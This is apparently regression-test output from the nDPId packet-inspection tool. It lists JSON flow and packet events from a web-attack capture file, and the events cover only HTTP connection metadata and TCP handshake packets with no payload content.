+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347304125,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347304125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hKxAAD4GQSSsEAABwKgKMtnWAFBzErTWAAAAAKACchArQAAAAgQFtAQCCAoBOjB6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2dawo5LBcxK016AScSDi5QAAAgQFtAQCCAoD5AHwATowegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":3,"flow_last_seen":1499347304126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347304126,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK1AAD4GQSusEAABwKgKMtnWAFBzErTXsKOSwoAQAOWB7AAAAQEICgE6MHsD5AHw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347305402,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347305402,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z+xAAD4GXeSsEAABwKgKMtnkAFD8k1ZWAAAAAKACchD+8AAAAgQFtAQCCAoBOjG6AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2eSBOT6p\/JNWV6AScSA42QAAAgQFtAQCCAoD5AMwAToxugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1499347305403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347305403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z+1AAD4GXeusEAABwKgKMtnkAFD8k1ZXgTk+qoAQAOXX4AAAAQEICgE6MboD5AMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347306680,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347306680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t61AAD4GDiOsEAABwKgKMtnyAFBPt4VUAAAAAKACchB7ggAAAgQFtAQCCAoBOjL5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2fJOMjqdT7eFVaAScSDrPgAAAgQFtAQCCAoD5ARvAToy+QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t65AAD4GDiqsEAABwKgKMtnyAFBPt4VVTjI6noAQAOWKRgAAAQEICgE6MvkD5ARv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347309314,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347309314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V4pAAD4GbkasEAABwKgKMtoMAFADiWIGAAAAAKACchDoUQAAAgQFtAQCCAoBOjWMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2gztcSluA4liB6AScSDHagAAAgQFtAQCCAoD5AcCATo1jAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V4tAAD4Gbk2sEAABwKgKMtoMAFADiWIH7XEpb4AQAOVmcgAAAQEICgE6NYwD5AcC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347310567,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347310567,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8riNAAD4GF62sEAABwKgKMtoaAFDhF5jmAAAAAKACchDSmwAAAgQFtAQCCAoBOjbFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2hoggEnh4ReY56AScSBc+gAAAgQFtAQCCAoD5Ag7ATo2xQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":3,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0riRAAD4GF7SsEAABwKgKMtoaAFDhF5jnIIBJ4oAQAOX8AQAAAQEICgE6NsUD5Ag7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347313106,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80LNAAD4G9RysEAABwKgKMto0AFBr7OnzAAAAAKACchD0JAAAAgQFtAQCCAoBOjlAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2jRgNfxEa+zp9KAScSCJ7wAAAgQFtAQCCAoD5Aq2ATo5QAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00LRAAD4G9SOsEAABwKgKMto0AFBr7On0YDX8RYAQAOUo9wAAAQEICgE6OUAD5Aq2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347314358,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347314358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wpZAAD4GAzqsEAABwKgKMtpCAFAntfjvAAAAAKACchAoGQAAAgQFtAQCCAoBOjp5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2kLsSHY8J7X48KAScSC2nwAAAgQFtAQCCAoD5AvvATo6eQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1499347314359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347314359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wpdAAD4GA0GsEAABwKgKMtpCAFAntfjw7Eh2PYAQAOVVpwAAAQEICgE6OnkD5Avv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347315631,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347315631,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8y+VAAD4G+eqsEAABwKgKMtpQAFAKdfBSAAAAAKACchBMqgAAAgQFtAQCCAoBOju3AAAAAAEDAwc="} 